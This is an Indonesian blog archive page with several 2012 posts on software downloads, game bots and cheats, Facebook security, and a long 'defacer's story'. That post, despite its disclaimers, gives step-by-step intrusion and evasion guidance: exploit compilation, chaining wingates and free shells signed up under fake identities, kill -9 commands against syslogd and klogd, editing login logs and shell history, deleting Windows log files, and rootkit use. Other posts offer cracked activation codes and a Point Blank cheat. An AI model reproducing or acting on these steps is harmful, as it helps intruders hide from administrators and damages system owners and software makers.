Tampilkan postingan dengan label pengetahuan internet. Tampilkan semua postingan
Tampilkan postingan dengan label pengetahuan internet. Tampilkan semua postingan

lindungi komputermu dengan Zone Alarm Free Firewall 2012

Diposting oleh Unknown on Senin, 30 Juli 2012

Salah satu software keamanan komputer yang cukup populer digunakan untuk sistem operasi Windows adalah Zone Alarm. Software ini berfungsi sebagai firewall yang dapat melindungi komputer dari ancaman hacker yang masuk dan program jahat (malware) merusak sistem komputer.

Saat ini versi teranyar dari Zone Alarm adalah Zone Alarm Free Firewall 2012 yang sudah termasuk anti-phishing untuk membantu mendeteksi dan memblokir situs-situs berbahaya ketika kita sedang online.


Software Zone Alarm ini dapat diinstall berbarengan dengan software anti virus seperti Avast, AVG, Avira dan yang lainnya.
Berikut fitur selengkapnya dari Zone Alarm Free Firewall 2012:
- Blocks new, unknown viruses and spyware. Stops botnets from sending your personal info out.
- Cloud-based security leverages real-time data from community of millions to protect silently.
- Makes your PC invisible to hackers.
- Provides credit scores, alerts and risk evaluation to protect your Identity.
- Effective and quiet security that won’t slow you down.
- Easy for all levels of users
Zone Alarm Free Firewall 2012 ini bersifat gratis (untuk penggunaan pribadi), berukuran cukup kecil yaitu sekitar 5 MB dan dapat kita install pada komputer dengan sistem operasi Windows XP, Windows Vista dan Windows 7.

Bagi temen-temen yang tertarik untuk melengkapi sistem keamanan komputernya dengan Zone Alarm Free 2012, software ini dapat kalian download disini : http://www.zonealarm.com/
More aboutlindungi komputermu dengan Zone Alarm Free Firewall 2012

2000 lebih situs proxy dunia!!!

Diposting oleh Unknown on Sabtu, 28 Juli 2012

ya mungkin di indonesia hanya saya yang menyediakan proxy sebanyak itu ^_^
sandy the aqworld
aqworld indonesia 




ok langsung aja yah dah malem neh ngantuk sangat saur" update proxy hehehe


nih proxynya download langsung aja yah di bawah ini


proxy 1

proxy 2



ok udah dulu yah segtu aja jangan banyak" ntar ente muntah lagi hehehe ^_^

see you all!
More about2000 lebih situs proxy dunia!!!

kamus di HP berbasis java

Diposting oleh Unknown on Jumat, 27 Juli 2012


Bagi sobat pengguna HP berbasis Java, atau bagi para pengguna yang hobi ama HP Cina. Gimana kalau kalian coba aplikasi ini. Aplikasi kamus Inggris Indonesia, lengkap dengan cara baca, contoh, Regular Verb, and Irregular Verb.
Jadi jika sobat pergi ke sekolah, ga usah bawa kamus yang gede,
lagian kan juga bisa buat nyontek, hehe.. Sebenernya sih aplikasi ini ada di getjar.com, tapi kalo kita download disana ada kode aktivasinya yang harus kita bayarkan. Nah, saya sudah googling kesana-sini dan sudah dapat kode aktivasinya. Silakan langsung download ya sob!!!!

Download via ziddu Kamus Pro klik disini, kode aktivasi klik disini

Download via 4shared Kamus Pro klik disini, kode aktivasi klik disini


More aboutkamus di HP berbasis java

Cara Memasang Widget dan Tombol Follow Twitter di Blog

Diposting oleh Unknown on Kamis, 26 Juli 2012


Bagi seorang blogger, media sosial meruapakan salah satu media yang akan dijadikan sebagai kunci sukses untuk menarik visitor ke dalam web atau blognya. Salah satu media yang selalu dimanfaatkan adalah Twitter. Memang twitter masih tergolong jejaring sosial yang kurang berpengaruh dibandingkan Facebook yang sudah menjadi ujung tombak media promosi para blogger.
Namun akhir-akhir ini Twitter sudah mulai dilirk bagi para blogger yang sedang ingin mempromosikan konten blognya. Banyak cara yang mereka lakukan, diantaranya adalah memasang widget Twitter ke dalam blognya. Dengan memasang widget twitter ke dalam blogblogger secara tidak langsung akan mengundang visitor untuk memfollow twitternya. Nahh dengan begitu followers akan menjadi lebih banyak dan secara otomatis proses promosi yang dilakukan di twitter akan semakin berpengaruh terhadap jumlah visitor blog anda. Akan tetapi, itu juga tergantung kitanya apakah bisa memanfaatkan media sosial tersebut dengan baik atau hanya sia-sia saja.
Untuk kawan blogger yang ingin memasang widget ke dalam blog, berikut ini adalah sedikit tips alakadarnya yang mungkin bisa membantu.

Cara Memasang Widget Twitter

1. Silahkan login terlebih dulu ke akun twitter anda.
2. Jika sudah berhasil login, klik link ini http://twitter.com/about/resources/widgets/widget_search
3. Nantinya anda akan diarahkan ke dalam sebuah form yang masih dalam keadaan default. Ubahlah infonya sesuai dengan profil dan keinginan anda. Di bawah ini adalah contoh dari perubahan yang saya lakukan.


4. Jika sudah anda anggap selesai. Silahkan klik saja Finish & Grab Code

5. Copy kode yang sudah ada dan pastekan ke dalam blog anda.

Cara Memasang Tombol Follow Twitter

1. Sama seperti di atas, anda juga harus login ke akun twitter
2. Lalu silahkan klik link berikut http://twitter.com/about/resources/buttons#follow
3. Anda akan diarahkan pada sebuah tampilan seperti screenshot di bawah ini. Edit dan isi sesuai keinginan anda
4. Jika sudah, silahkan copy script yang sudah tersedia dan pastekan ke dalam blog anda
Selesai dan bisa sobat lihat hasilnya ! Semoga bermanfaat :D

More aboutCara Memasang Widget dan Tombol Follow Twitter di Blog

cara mengembalika file yang telah di hapus

Diposting oleh Unknown


File anda terhapus dengan tidak sengaja ? Tenang saja dengan aplikasi yang bernama Pandora Recovery ini mudah-mudahan bisa membantu anda untuk mengembalikan file tersebut. Selainaplikasi ini mudah untuk digunakan,aplikasi ini dapat kita download di situs websitenya dengan GRATIS dan LEGALtanpa mengeluarkan biaya sedikitpun. Akan tetapi, Pandora Recovery hanya support dengan Operating System Windows saja.
Fitur di dalam aplikasi ini sangatlah banyak, mulai dari file yang terhidden, file compress, file image, video, data office. Selain itu juga mendukung FAT16, FAT32, NTFS, NTFS5 dan NTFS/EFS. Di sini saya akan memberikantutorial bagaimana langkah-langkah merecovery data anda yang hilang.
1. Silahkan kunjungi website di www.pandorarecovery.com atau langsung ke www.pandorarecovery.com/download/ untuk mendapatkan aplikasinya. Ingat ! aplikasi ini GRATIS dan LEGAL
2. Install aplikasinya
3. Setelah berhasil terinstall, jalankan aplikasi tersebut, maka anda akan menemukan tampilan seperti gambar di bawah ini. Untuk memulainya langsung saja klik Next

4. Ada 2 pilihan, Yes, I found my files jika kita telah menemukan file yang dihapus dan kita ingin mengembalikannya ke tempat Recycle Bin dan No, I’ve not found my files  jika kita telah menghapus bersih Recycle Bin untuk mengembalikan file yang telah hilang. Di dalam turorial ini, saya memilih No, I’ve not found my files. Lalu klik Next.

5. Pilih drive mana yang ingin anda kembalikan file yang telah terhapus. Lalu klik Next.

6. Pilih saja Deep (Surface) Scan agar memudahkan kita. Lalu klik Next.

7. Centang ekstensi file yang ingin anda kembalikan, di sini saya memilih ekstensi .JPG. Lalu klik Start Disk Surface Scan.

8. Tunggu proses scanning sampai selesai.

9. Scanning file sudah selesai. Pilih file yang ingin anda kembalikan. Lalu klik icon Recuver yang sudah saya lingkari untuk mengembalikan filenya.

10. Klik Browse untuk menempatkan file yang sudah berhasil discan.

11. Kemudian klik Recuve Now.

12. Klik Close

13. Dan inilah hasil dari scanning menggunakan Pandora Recovery tadi. Hasilnya sangat memuaskan dan pasti akan membantu anda :D

semoga tutorial sederhana ini bisa membantu anda dalam merecovery file yang sudah terhapus, amiinn … :)
Thanks to : kucoba.com | website-download.blogspot.com  | pandorarecovery.com
More aboutcara mengembalika file yang telah di hapus

Le bot 3.7 [super new]

Diposting oleh Unknown


wow ga kerasa yah udah update lagi bang james
dia emang pembuat Le bot yg hebat!
cepet bngt updatenya  

oke langsung aja yah ^_^ 


(Screenshoot...!!)





I can confirm this is 100% safe, HOWEVER use at your own risk!
Current features(press F2 to show):

Lag Killer;
Auto use boosts(XP, CP, Gold and Rep);
Trade Voucher for Diamond.
'Rest if HP is less than' button;
Get boosts(XP, CP, REP and GOLD);
Load Quest;
Minimize to tray;
Botting features:

1vs1 Trophies;
Alchemy Rep;
Ancient Vitae;
Arcangrove Rep;
Alchemy reagents;
Banished XP & Gold;
Combat Trophies;
Chronospan Rep;
Dinocaves XP
Dark Crystal Shards Bot(I recommend you bot on a full server like Twilly or Cysero, otherwise killing Vath will be tough!);
Doomwood rep;
Dwakel Gold;
Dwarfhold rep;
Escherion Helm bot[member only];
Etherstorm Airstorm rep;
Etherstorm war rep;
Evil War(nulgath & Dage);
Fishing XP Bot(READ THE INFO BELOW);
Good & Evil + Tainted gem(requires rank 4 in both);
Horc rep;
Legion Insanely Insane bot;
Legion tokens(Soul Collector and non Soul Collector)(Screen Hopping added);
Lycan rep;
Mana Golem bot;
Mythsong rep;
Spirit Orbs Bot;
Swag Tokens (Auto conversion to A added!)[member only];
Sandsea rep;
Skyguard Rep[member only];
Tainted Gems;
Totems of Nulgath bot[Member & non-Member];
Troll Rep;
Troll + Horc;
Undead Pirates XP bot;
Vampire rep;
Yokai rep;
Supported Classes:

Healer
Acolyte
Witch
Mage
Sorcerer
Warrior
Warlord
Beast Warrior
Pumpkin Lord
Rogue
Barber
Leprechaun
Pirate
Alpha Pirate
Renegade
Vampire
Berserker
Beta Berserker
Ninja
Assassin
Enforcer
Rustbucket
Protosartorium
Elemental Dracomancer
Bard
CardClasher
Chaos Shaper
Chronomancer
ClawSuit
Defender
DoomKnight
Dragonlord
Dragonslayer
Evolved Shaman
Evolved ClawSuit
Giftbox
Guardian
Necromancer
Paladin
Ranger
Troll Spellsmith
Shaman
Starlord
UndeadSlayer
Vindicator Of They
MindBreaker
Pyromancer
Darkside
Blood Ancient
Chaos Shaper
Chronomancer
DeathKnight
Skyguard Grenadier




Download Le Bot 3.7 (download)

Credits : JamesR's
More aboutLe bot 3.7 [super new]

cerita seorang defacer

Diposting oleh Unknown

Pertama kalinya, saya tidak mendeface, dan tidak akan pernah melakukannya. Jadi bagaimana saya mengetahui cara mendeface? saya kira saya hanya melihat cara orang-orang mendeface dan saya bukanlah ahlinya dalam hal ini. Jika saya melakukan kesalahan maka saya mohon maaf. Ini adalah cara sederhana saat anda memikirkan bahwa mendeface itu hanya sekedar mengganti file di suatu computer. Saat ini, mencari exploit merupakan hal pertama, exploit yang sesungguhnya buah dari keterampilan, pengetahuan para hacker yang sejati. Saya tidak menganjurkan agar anda mendeface semua website, apalagi untuk mendapatkan credit card, password, source code, info billing, database email dsb... (sungguh anda benar-benar perusak yang tidak tahu diri).


Tutorial ini terdiri dari 3 bagian utama, yaitu:1. Celah Keamanan Host2. Menyusup3. Menghapus Jejak


Sangat mudah, dan saya akan menunjukkan hal tersebut kepada anda.


1. Celah Keamanan HostAda dua kategori script kiddies: pertama, seseorang yang melakukan scan di internet pada suatu host yang memiliki celah keamanan dengan exploit tertentu dan mencari website tertentu untuk mencoba berbagai exploit. Kelompok pertama ini melakukan scanning ribuan situs dengan suatu exploit tertentu. Mereka tidak peduli siapa yang mereka hack, dan untuk apa. Mereka tidak memasang target dan tidak memiliki tujuan yang pasti. Menurut pendapat saya orang-orang ini memiliki alasan yang terlalu dibuat-buat seperti:


- "Saya hanya memastikan agar mereka mengupdate web security-nya"- "Saya hanya menyampaikan pesan politis saja kok!"- "Saya melakukan deface untuk mendapatkan perhatian media massa"


Orang-orang yang mendeface menjadi terkenal atau untuk menunjukkan bahwa mereka sangat terampil dan hebat, perlu kedewasaan dan menyatakan bahwa ada cara yang lebih baik ketimbang melakukan deface dengan alasan yang dibuat-buat.



Scanning Script Kiddie: Anda perlu mengetahui adanya celah keamanan, entah itu pada service yang dijalankan, sistem operasi atau file CGI-nya. Bagaimana cara anda mengetahui adanya celah keamanan? Versi berapa yang dijalankan? anda perlu mengetahui bagaimana mencarinya exploit web di internet (dengan google.com). Menggunakan suatu script untuk scanning range ip pada port tertentu yang memiliki celah keamanan. Atau menggunakan http://www.netcraft.com/ untuk mengetahui jenis server, sistem operasi dan aplikasi yang dijalankan (frontpage, php, asp, dsb..). nMap dan port scanner lainnya dapat melakukan scanning dengan cepat terhadap ribuan ip pada suatu port yang terbuka. Ini merupakan teknik favorit bagi mereka yang ingin melakukan hacking secara massal.



Website Target Script Kiddie: Sebaiknya para script kiddies melakukan hack pada berbagai website lawas. Langkah utama adalah mengumpulkan informasi situs tersebut sebanyak mungkin. Mencari sistem operasi yang dijalankan melalui netcraft.com atau menggunakan: telnet http://www.site.com/ 80 kemudian GET /HTTP/1.1 mencari service apa yang dijalankan melalui port scan. Mencari spesifikasi service dengan melakukan telnet. Mencari berbagai script CGI, atau file-file lainnya yang memungkinkan anda mengakses server tersebut dengan mengeksploitasi /cgi /cgi-bin dan browsing ke website tersebut.


Setelah mencari berbagai informasi yang anda miliki selanjutnya anda dapat melakukan:



2. PenyusupanUntuk melakukan hal ini anda dapat mencari berbagai exploit yang dapat digunakan untuk mengakses website tersebut. JIka anda melakukan scanning dan anda akan mengetahui exploit apa yang tepat untuk digunakan. Dua temnpat utama untuk mencari exploit adalah melalui website http://www.securityfocus.com/ dan http://www.packetstormsecurity.org/. Setelah mendapatkan exploit, periksa dan pastikan bahwa exploit tersebut memang untuk versi service, sistem operasi, script dsb yang dijalankan. Exploit umumnya dibuat menggunakan dua bahasa pemrograman yaitu C dan Perl. Script Perl memiliki ekstensi .pl atau .cgi, sedangkan C memiliki ekstensi .c, untuk mengkompilasi suatu file C (pada sistem *nix) gunakan perintah gcc -o exploit12 file.c lalu: ./exploit12. Sedangkan untuk Perl cukup melakukan perintah chmod 700 file.pl (sebenarnya tidak diperlukan) lalu: file Perl.pl. Ini hanyalah teknik kompilasi yang sederhana atau hanya teori kemungkinan exploit. Lakukan saja sedikit penelitian bagaimana cara menggunakannya. Hal lain yanganda perlukan untuk memeriksa apakah exploit tersebut merupakan remote atau local. Jika exploit lokal maka anda harusmemiliki suatu account atau akses secara fisik pada computer tersebut. Jika remote maka anda dapat melakukannya melalui jaringan (internet).


Jangan hanya bisa mengkompilasi exploit, ada satu hal penting yang perlu anda ketahui yaitu:


Menghapus JejakSetelah anda mendapatkan informasi mengenai host dengan tujuan mencari suatu exploit yang cocok yang memungkinkan anda menyusup. Mengapa tidak segera melakukannya? masalahnya adalah menghapus jejak hacking anda tergolong sulit, sulit diprediksi. Hanya karena anda meng-"kill" sys log tidak berartibahwa anda tidak terlacak oleh logger atau IDS (Intrusion Detection System) yang dijalankan. Banyak sekali script kiddies yang meremehkan kemampuan para admin yang hostnya mereka jadikan sasaran. Sebagai gantinya para script kiddie mencoba menggunakan account isp kedua untuk memulai hacking, memang akan terlacak tapi takkan tertangkap. JIka anda tidak memiliki fasilitas ini maka anda HARUS memiliki banyak wingate, shell account atau trojan untuk melakukan bounce off. Menghubungkannya secara bersamaan akan menyulitkan seseorang melacak keberadaan anda.Log pada wingate dan shell seringkali dihapus setelah 2-7 hari. Meski log dipelihara seluruhnya, tetap sulit bagi admin untuk melacak lebih jauh wingate atau shell-nya script kiddie sebelum log tersebut harus dihapus. Dan jarang sekali seorang admin memperhatikan dengan seksama terjadinya suatu serangan, bahkan kecil kemungkinannya mau mengejar attacker, yang penting bagi mereka adalah mengamankan box mereka dan melupakan yang telah terjadi.


Untuk alasan keamanan, jika anda menggunakan wingate dan shell, jangan melakukan apapun untuk mem-"pissed off" admin terlalu banyak (yang membuat mereka memanggil otorisasi atau mencoba melacak keberadaan anda) dan hapuslah log anda agar aman. Bagaimana cara melakukannya?


Ringkasnya, kita memerlukan beberapa wingate. Wingate secara alami cenderung mengubah ip atau shutdown sepanjang waktu, jadi diperlukan daftar terbaru atau program yang melakukan scan di internet. Anda dapat mendapatkan daftar wingate yang up to date di


http://www.cyberarmy.com/lists/wingate/ atau anda juga bisa menggunakan program yang disebut winscan. Nah anggaplah anda memiliki 3 wingate:


212.96.195.33 port 23 202.134.244.215 port 1080 203.87.131.9 port 23


Untuk menggunakannya jalankan telnet dan hubungkan ke port 23, akan terlihat respon seperti ini:


CSM Proxy Server >


Untuk menghubungkan ke wingate berikutnya kita ketikkan ip:port seperti ini:


CSM Proxy Server >202.134.244.215:1080


JIka terjadi error maka proxy yang coba anda hubungi tidak ada atau anda harus login ke proxy. Jika semuanya berjalan dengan baik, anda akan mendapatkan 3 rangkaian dan shell account yang terhubung. Pada shell account tersebut anda dapat melakukan link shell bersamaan dengan:


[j00@server j00]$ ssh 212.23.53.74


Anda memperoleh free shell yang bekerja hingga mendapatkan shell lainnya yang dihack, berikut ini daftar dari free shell account. Ingat, mendaftarlah dengan informasi palsu dan jika memungkinkan, melalui suatu wingate.


SDF (freeshell.org) - http://sdf.lonestar.org/ GREX (cyberspace.org) - http://www.grex.org/ NYX - http://www.nxy.net/ ShellYeah - http://www.shellyeah.org/ HOBBITON.org - http://www.hobbiton.org/ FreeShells - http://www.freeshells.net/ DucTape - http://www.ductape.net/ Free.Net.Pl (Polish server) - http://www.free.net.pl/ XOX.pl (Polish server) - http://www.xox.pl/ IProtection - http://www.iprotection.com/ CORONUS - http://www.coronus.com/ ODD.org - http://www.odd.org/ MARMOSET - http://www.marmoset.net/ flame.org - http://www.flame.org/ freeshells - http://freeshells.net.pk/ LinuxShell - http://www.linuxshell.org/ takiweb - http://www.takiweb.com/ FreePort - http://freeport.xenos.net/ BSDSHELL - http://free.bsdshell.net/ ROOTshell.be - http://www.rootshell.be/ shellasylum.com - http://www.shellasylum.com/ Daforest - http://www.daforest.org/ FreedomShell.com - http://www.freedomshell.com/ LuxAdmin - http://www.luxadmin.org/ shellweb - http://shellweb.net/ blekko - http://blekko.net/


Setelah sebelumnya mendapatkan shell, anda dapat mengkompilasi exploit, dan anda menjadi sulit dilacak. Agar lebih yakin, hapuslah semua bukuti yang menunjukkan keberadaan anda.


Baiklah, ada beberapa hal pada sisi server yang para script kiddies perlu ketahui. Keharusan untuk mengedit atau menghapus log. Script Kiddies sejati munkin menggunakan suatu rootkit yang secara otomatis dapat menghapus log. Ada 2 log utama daemon yang akan saya jelaskan, yaitu klogd yang berupa log kernel, dan syslogd yang berupa log sistem. Langkah pertama untuk melakukan "kill" daemon tersebut agar tidak me-log apapun tindakan anda.


[root@hacked root]# ps -def | grep syslogd [root@hacked root]# kill -9 pid_of_syslogd


Pada baris pertama kita menemukan pid syslogd, sedangkan baris kedua kita melakukan "kill" daemon tersebut, anda juga dapat menggunakan /etc/syslog.pid untuk mencari pid syslogd.


[root@hacked root]# ps -def | grep klogd [root@hacked root]# kill -9 pid_of_klogd


Langkah yang sama kita gunakan pula terhadap klogd


Sekarang default logger telah di kill, maka script kiddies perlu menghapusnya dari log. Untuk mencari dimana syslogd menaruh log, periksa file /etc/syslog.conf. Tentunya jika anda tidak peduli kalau admin mengetahui bahwa anda menghapus seluruh log. Dalam hal ini anda benar-benar seorang "perusak", seorang defacer sialan, sang admin akan mengetahui bahwa box mereka disusupi saat website tersebut terdeface. Jadi tidak ada point yang ditambahkan log tersebut, mereka akan menghapusnya. Adapun alasannya adalah agar para admin tidak mengetahui bahwa telah terjadi pembobolan. Saya akan menuliskan alasan utama orang-orang ini membobol suatu box (system).


Mendeface website - lamer, tidak ada tujuan, hanya ingin merusak sistem.


Sniffing password jaringan - ada beberapa program yang memungkinkan anda melakukan sniff password yang dikirimkan dari dan ke suatu sistem. Jika sistem ini berada pada jaringan ethernet maka anda dapat melakukan sniff packet (yang berisikan password) yang diperuntukkan pada berbagai sistem dalam segment tersebut.



Melakukan DDoS attack. - lamer, sang admin memiliki banyak kesempatan untuk memperhatikan bagaimana anda mengirimkan ratusan MB melalui koneksinya.



Melakukan serangan lain pada suatu sistem - teknik ini dan sniffing diatas sangat umum digunakan, bukan pekerjaan lamer. Anda mengetahui bagaimana dengan suatu rootshell anda dapat melancarakan serangan dari sistem ini sebagai ganti dari keterbatasan freeshell. Anda memiliki kendali mutlak terhadap log dari shell tersebut.


Memperoleh Informasi Sensitif - Beberapa sistem perusahaan memiliki informasi berharga seperti database Credit Card, source code piranti lunak, daftar username/password, dan informasi rahasia lainnya yang diinginkan seorang hacker.


Untuk belajar dan bersenang-senang - banyak orang melakukannya demi sensasi hacking dan menambah pengalaman. Saya tidak melihat hal ini sebagai suatu kejahatan sepanjang tidak merusak apapun. Kenyataannya beberapa orang hacker bahkan menolong admin tersebut melakukan patch terhadap 'hole' yang ditemukan. Meski tergolong ilegal, asalkan tidak menghancurkan sistem orang lain.


Saya akan menjelaskan dasar-dasar file log seperti: utmp, wtmp, lastlog, dan .bash_history. File-file ini biasanya berada di /var/log/ tapi saya dengar juga bisa ada di /etc/ /usr/bin dan tempat lainnya. Pada kebanyakan sistem yang berbeda langkah terbaik adalah melakukan find / -iname 'utmp'|find / -iname 'wtmp'|find / -iname 'lastlog'. dan juga mencari melalui direktori /usr/ /var/ dan /etc/ pada log lainnya. Sekarang akan saya jelaskan ketiga file ini:


utmp merupakan file log yang mencatat siapa saja yang mengakses sistem, saya pikir anda dapat melihat mengapa log ini harus ditambahkan. Karena anda tidak ingin membiarkan siapapun mengatahui bahwa anda berada dalam sistem tersebut.


wtmp merupakan file log yang mencatat proses login dan logout, tentunya anda tidak ingin pula hal ini diketahui oleh admin. Harus diedit untuk menunjukkan bahwa anda tidak pernah login atau logout dan lastlog yang merupakan suatu file yang mencatat rekaman seluruh aktifitas login. Selain itu history dari shell yang anda gunakan juga mencatat seluruh perintah yang anda ketikkan, anda harus mencari pada direktori $ HOME dan mengeditnya.


.sh_history, .history, dan .bash_history merupakan nama umum, yang harus diedit bukan dihapus. Jika anda menghapusnya sama saja memberitahukan kepada admin bahwa "Yuhuuu, Sistem Anda Kebobolan!". Para Newbie Script Kiddies seringkali mendeface dan diikuti rm -rf/ agar aman. Sebisa mungkin hindari hal ini kecuali anda memang rada-rada sinting. Dalam kasus ini saya sarankan agar tidak mencoba mengeksploitasi sistem lagi. Cara lain untuk mencari file log adalah menjalankan suatu script yang memeriksa file-file terbuka (dan secara manual melihatnya untuk menentukan apa saja yang di-log) atau mencari file yang sudah diedit, melalui perintah seperti: find / -ctime 0 -print


Ada beberapa script populer yang dapat menyembunyikan keberadaan anda dari log seperti: zap, clear, dan cloak. Zap berfungsi untuk mengganti keberadaan anda pada log dengan angka 0, sedangkan Clear akan menghapus log dari keberadaan anda, dan Cloak akan mengganti kehadiran anda dengan informasi lain. Menurut pengalaman saya, acct-cleaner cukup berat digunakan script untuk menghapus log account. Banyak rootikit yang memiliki script penghapus log, dan saat menginstallnya log tidak akan mengetahui keberadaan anda. Jika anda berada pada sistem NT, maka file log-nya ada di C:\winNT\system32\LogFiles\, hapus file ini, para admin NT seringkali tidak memeriksa atau mengetahui artinya bila terhapus.


Hal terakhir mengenai penghapusan jejak, saya tidak akan menjelaskan secara rinci mengenai hal ini karena membutuhkan suatu pembahasan tersendiri. Saya hanya membicarakan mengenai rootkit. Apakah rootkit itu? Mereka ini digunakan secara luas guna menghapus jejak anda saat memasuki suatu sistem. Menjadikan anda tetap "hidden" dalam sistem. Login tanpa password, tidak di log oleh wtmp atau lastlog dan bahkan tanpa perlu ada pada file /etc/passwd. Dengan rootkit ini membuat perintah seperti ps untuk menyembunyikan proses, jadi tak seorangpun mengetahui program apa yang sedang anda jalankan. Mereka mengirimkan laporan palsu pada netstat, ls dan seolah-olah semuanya berjalan dengan normal. Oh, jangan senang dulu, ada beberapa kelemahan dari rootkit, pada beberapa perintah yang dilakukan menimbulkan keanehan karena binary tidak bekerja secara benar. Mereka juga meninggalkan fingerprint (cara mengetahui bahwa file ada dalam rootkit). Hanya admin yang hebat saja yang dapat memeriksa rootkit, jadi hal ini bukanlah ancaman serius, tapi patut dipertimbangkan. Rootkit dibuat dengan suatu LKM (loadable kernel modul) yang sangat ideal untuk menyembunyikan keberadaan anda dan kebanyakan admin tidak mengetahui adanya aktifitas mencurigakan.


Dalam menulis tutorial ini saya mengikutkan perasaan. Saya tidak ingin ada lagi script kiddies yang melakukan scanning ratusan website untuk dieksploitasi. Saya tidak ingin nama dan nickname saya dicatut. Saya sudah lelah mendengar orang-orang berkata seperti ini, "Tidak ada sistem komputer yang aman 100%, Update webserver anda, Hacked by ....dst." Meninggalkan nick atau nama kelompok mereka kemudian kabur begitu saja. Saya rasa banyak orang-orang yang ingin mempelajari segala sesuatu dengan tujuan membobol sistem, yang seringkali disamarkan atas nama ilmu pengetahuan.


Tutorial ini mencoba mengatakan bahwa betapa sederhananya memasuki suatu sistem. Namun bukanlah panduan lengkap, saya tidak menjelaskan banyak hal. Saya harap admin menemukan tutorial ini dan merasa terbantu, mempelajari bahwa website-nya harus dijaga dan sering melakukan patch. Melindungi diri sendiri dengan IDS dan menemukan berbagai celah keamanan pada sistem anda sendiri (menggunakan vuln scanner). Juga mengatur setting sistem eksternal untuk melakukan log bukanlah ide yang buruk. Para admin seharusnya melihat beberapa pemikiran script kiddies dan mempelajari beberapa hal yang mereka lakukan... dan menangkap basah mereka yang membobol sistem anda. Adil khan?


Ingatlah, Mendeface sama dengan perusak (lamer). Saya banyak mengetahui orang-orang yang melakukan deface dan sekarang menyesalinya. Anda hanya akan menjadi script kiddie dan tetap seorang lamer abadi.


sekian.   trima kasih!!!
More aboutcerita seorang defacer

Orang Indonesian Dikasi $1500 oleh Facebook gara-gara Ngereport Script Maho

Diposting oleh Unknown on Rabu, 25 Juli 2012

Salam Selamat Malam kawan-kawan.

hot News. Orang indonesia bernama Aswin Bahar Admin dari Grup Hacker Indonesia di beri bonus $ 1500 atau setara dengan kira-kira Rp. 15.000.000 oleh facebook karena telah berhasil melaporkan script Maho yang akhir akhir ini meresahkan Facebook. Dia sangat bersyukur atas hadiah yang diberikan Facebook kepadanya.. Kita sebagai orang indonesia patutnya bangga terhadap prestasi IT Kita karena kawan kita yang satu ini telah berhasil mencantumkan namanya di http://www.facebook.com/whitehat

Lihat ini :




Kemudian ini gambar nya ketika kawan kita mendapat pesan dari Facebook Security Team :


Dia medapat Bounty karena telah melaporkan Script Maho yang telah membuat semua Group Facebook menjadi Blank :
Nih Screen Shot Script Mahonya :

Sekali lagi Selamat kepada Om Aswin Bahar. Semoga Di traktir Satu Grup Hacker Indonesia Yah :D
More aboutOrang Indonesian Dikasi $1500 oleh Facebook gara-gara Ngereport Script Maho

Cheat Point Blank Terbaru 23 Juli 2012

Diposting oleh Unknown on Senin, 23 Juli 2012

Cheat Point Blank Terbaru 23 Juli 2012
Tutorial D3D Menu Cheat PB 23/07/2012 :
  •     WHBersih
  •     Clean Wallhack
  •     Chams Hack
  •     Wh Clan
  •     No Fog
  •     Crosshair
  •     No Smoke

[ ESP Menu ]
  •     ESP Box
  •     ESP name
  •     ESP Healt
  •     ESP Distance
  •     ESP koordinat
  •     ESP line
  •     ESP CLAN

 [ Fullhack Menu ]
  •      2 Hit SG
  •     Auto HS
  •     Damage 20%
  •     Damage 40%
  •     Damage 75%
  •     Ammo Weapom
  •     Gm ACC
  •     No RESPon
  •     SKill Up
  •     Quick Change + Hp up 20
  •     Move speed
  •     Piso No Delay / Piso burst / Cakar dino Dewa
  •     Bug luxvile
  •     Magnet pro [Just Room Dino]

[ REplace Menu ]
  •     Replace PrimAry / Drop Weapon (new)
  •     Replace pistol
  •     Replace SMoke
  •     Replace Piso
  •     Replace Granades
  •     Replace baret

Penjelasan DEFEN UP
Untuk DEFFend Up on kan GM ACC dlu , karena fitur di masukan ke dalam 1 hotkeys saja,,
Lalu coba lempar bom kamu ke badan,! tarraa,, now you it's STRONG ,,wwkwkw
Coba kamu off kan gm ACC , dan lempar bom = pasti km mati ,,wkwwkwk

Hotkeys D3D Menu :
  •     D3d Menu On/OFF : INSERT
  •     Arah Panah kanan = ON
  •     Arah Panah Kiri OFF
  •     Arah Panah ats & Bawah Pilih cit

Keterangan : BUAT WINDOWS 7 and Windows Vista
  • -Buka Cheat Jangan Menggunakan DOUBLE klik!!!
  • -Tapi menggunakan Klik kanan -Runadministrator
  • -Buka PB nya pun jangan pakai Double Klik
  • -Tapi menggunakan Klik kanan -Runadministrator juga

Created
  • Pekalongan Cheater Community

selamat mencoba Cheat PB Point Blank Terbaru 23 Juli 2012 .!!
stand by terus disini karena besok akan ada yang terbaru 24 Juli 2012.

More aboutCheat Point Blank Terbaru 23 Juli 2012

burung" angry birds

Diposting oleh Unknown on Minggu, 22 Juli 2012

Permainan lempar burung-burung marah itu sudah menjadi salah satu game paling populer sedunia, hampir semua orang pengguna internet, pc, atau smartphone, mengetahuinya, bahkan saking populernya, permainan yang sebenarnya merupakan sebuah game simpel ini di bahas dan menjadi bahan ujian fisika.

Namun mungkin ada sedikit pertanyaan pernah terbersit terkait game Angry Birds ini, ingin tahu sebenarnya seperti apa sih wujud atau rupa burung-burung pemarah itu di dunia nyata atau alam liar? Nah, mungkin foto-foto burung ini bisa memberi gambaran karakter burung-burung unik dan lucu-lucu yang menjadi inspirasi dan hadir dalam game terpopuler itu.

http://blogtronyok.blogspot.com/ 
 
gmana rasa penasarannya dah ilang lom ?

^_^

-sandy the aqworld 

salam battleon!
More aboutburung" angry birds

Cara Amankan Fb anda dari seorang Hacker

Diposting oleh Unknown on Sabtu, 21 Juli 2012

Cara Amankan Fb anda dari seorang Hacker



Login ke facebook masuk pengaturan account atau bisa langsung klik ini http://www.facebook.com/mobile/?settings atau https://ssl.facebook.com/confirmphone.php lalu daftarkan no telepon dan aktifkan, ikuti aja petunjuknya disana, setelah itu  tinggal ikuti petunjuk berikut. Pilih menu AKUN/ACCOUNT, PENGATURAN AKUN/ACCOUNT SETTING, KEAMANAN AKUN/SECURITY ACCOUNT, kemudian klik dan pilih YA dan centang pengaturan metode via SMS. Beres dah, jika ada yang masuk ke akun facebook anda tanpa izin maka facebook akan memberitahu kamu langsung via sms bahwa akun anda ada yang memasuki tanpa izin, dan daftarkan ssl roadblock untuk pencegahan akun anda terhack.
Bagi anda yang biasa jalan-jalan ke page privacy di halaman facebook pasti akan menemukan fitur SSL ROADBLOCK. Apa itu SSL ROADBLOCK?
Ini adalah fitur bagi anda yang ingin akun facebook aman dari Hacker yang banyak berkeliaran di dunia maya ini yang bisa mengakses ke dalam akun anda.
